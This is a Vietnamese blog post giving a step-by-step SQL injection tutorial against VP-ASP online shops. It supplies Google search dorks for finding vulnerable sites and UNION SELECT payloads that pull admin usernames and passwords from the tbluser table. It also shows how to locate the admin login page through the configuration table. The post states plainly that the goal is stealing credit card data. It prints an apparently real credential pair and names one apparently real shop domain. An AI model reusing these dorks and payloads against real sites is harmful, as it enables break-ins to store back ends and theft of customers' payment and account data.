Nào giờ chúng ta bắt đầu nhé.
Cách này cũng như những cách thông thường là khai thác theo lỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác như OLE DB, JET Database, ASP…
Bước 1:
Để tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và Tìm Kiếm shop như thế nào cho thật là hiệu quả. Bước này cũng là bước quan trọng nhất vì không có shop lỗi làm sao hack.
Khuyến cáo nên Tìm Kiếm shop ở www.google.com hoặc www.Tìm Kiếm.com vì mình thấy 2 site này rất very good.
Từ khoá nên dùng:
allinurl:”shopdisplayproducts.asp?id=
hoặc allinurl:”shopdisplayproducts.asp?cat=1 hoặc allinurl:”shopdisplayproducts.asp?cat=2……
Tìm Kiếm shop theo Domain .com, .net , .biz…..:
allinurl:”.com/shopdisplayproducts.asp?cat=,allinurl:”.net/shopdisplayproducts.asp?cat=...
Ai biết chấm gì nữa thì thay vào
Khả năng lấy được credit card: là 99.9 % còn 0.1 % còn lại phụ thuộc vào cái đầu của bạn.
Xong phần Tìm Kiếm, bạn thu hoặch lại tất cả các shop bị lỗi và bắt đầu hack.
Bước 2:
Ví dụ: lấy ví dụ là 1 site thế có dạng thế này : http://www.victim.com
http://www.victim.com/shopdisplayproducts.asp?id=5
Ta sẽ thêm dấu phẩy ( ‘ ) vào sau số 5:
http://www.victim.com/shopdisplayproducts.asp?id=5’
Xem nó có bị lỗi không nào, hic nó không bị lỗi, chỉ thấy thế này:
Home Improvement
Page 1 of 2
Không sao, chúng ta hãy bình tĩnh nhé, thay “ id “ bằng “ cat “ thử xem:
http://www.victim.com/shopdisplayproducts.asp?id=5’
-->>> http://www.victim.com/shopdisplayproducts.asp?cat=5’
Uh, nó lỗi ruì kìa:
5'
Microsoft JET Database Engine error '80040e14'
Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '5'%' and hide=0 order by specialoffer desc,cname'.
/shop$db.asp, line 467
Okie, tiếp tục nhé, bạn sẽ thêm đoạn code sau đây vào:
'%20union%20%20select%201%20from%20tbluser"having%201=1--sp_password
http://www.victim.com/shopdisplayproducts.asp?id=5’
Khi thêm xong thì sẽ như thế này:
http://www.victim.com/shopdisplayproducts....=1--sp_password
và được thế này :
5' union select 1 from tbluser"having 1=1--sp_password
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
/shop$db.asp, line 467
Chú ý nhé các bạn, cái dấu phẩy ( ‘ ) rất quan trọng, không có là không được.
Và cứ thế ta cứ tiếp tục thêm số nhé:
http://www.victim.com/shopdisplayproducts....=1--sp_password
http://www.victim.com/shopdisplayproducts....=1--sp_password
http://www.victim.com/shopdisplayproducts....=1--sp_password
Cứ thế mà tiếp tục cho đến khi bạn thấy 1 cái bảng đẹp đẹp hiện ra với vài con số.
Ở đây là tới số 47 :
http://www.victim.com/shopdisplayproducts....=1--sp_password
3
click to see more
4
22
18
Please review these other products:
Nào giờ chúng ta bắt đầu lấy user and pass:
• fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn
• fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn
Sau khi thêm xong ta sẽ được như thế này:
http://www.victim.com/shopdisplayproducts....=1--sp_password
Và có được username và password :
User: stephenrossi
pass: gnilsur
Hoặc bạn có thể gộp chung fldusername và fldpassword vào 1 số cũng được.
http://www.victim.com/shopdisplayproducts....=1--sp_password
Ta sẽ được user và pass được gộp chung 1 số:
stephenrossi/gnilsur
Bước 3:
Tìm link admin, thử đánh cái này vào được không nào: http://www.victim.com/shopadmin.asp hic không được rồi.
Thử cái này nữa thử xem, may ra nó chạy đến link admin thì sao: http://www.victim.com/shopadmin1.asp , cũng không được.
Cái này hieupc đã download cái source của VPASP về xem cấu trúc nó thế nào, và đã tìm ra cậu lệnh thế này, chẳng qua là thay table thôi.
Ta biết table configuration là nơi chứa những thông quan trọng của shop như là link admin, afftemplateaffiliate, afftemplateMerchant…..
Vậy cậu lệnh sẽ thế này:
'%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,
30,31,32,33,34,35,36
,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
Thay vào ta sẽ được:
http://www.valuevision.com.ph/shopdisplayp...=1--sp_password
Ta cũng thấy cái bảng:
3
click to see more
4
22
18
Please review these other products:
Lần này thì ta sẽ kiếm link admin, thường thì link admin nằm trong fieldvalue , vì thế ta sẽ đặt fieldvalue vào số 3, hay 4, hay 22 tuỳ các bạn.
'%20union%20%20select% 201,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,
27,28,29,30,31,32,33
,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
Sau khi thêm xong ta sẽ được thế này:
http://www.victim.com/shopdisplayproducts....=1--sp_password
Các bạn sẽ chẳng thấy link admin ở đâu hết toàn là mấy con số, lúc đầu hieupc cũng tưởng là mình làm sai cậu lệnh, nhưng loay hoay 1 đỗi , kéo trang lên, kéo trang xuống, à thì ra có tới 10 trang.
Page 1 of 10
Chỉ cần để ý là các bạn thấy thôi, nói thêm là: mỗi một trang như vậy là chứa những thông tin có trong fieldvalue , các bạn cứ cố gắng view từng trang nhé, hieupc view hết 10 trang và thu thập được những link có đuôi là *.asp:
shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
Nhất định 1 trong 3 link này là link admin login , hieupc đã thử hết 3 link và cái link đầu tiên là link admin shopaddmoretocart.asp
http://www.victim.com/shopaddmoretocart.asp
This site is reserved for Shop Administrators only.
Administrator's Login
UserName
Password
Bây giờ lấy username và password ở trên để thay vào. Việc còn lại chắc các bạn biết.
Chúc các bạn vui vẻ.
The End
No comments:
Post a Comment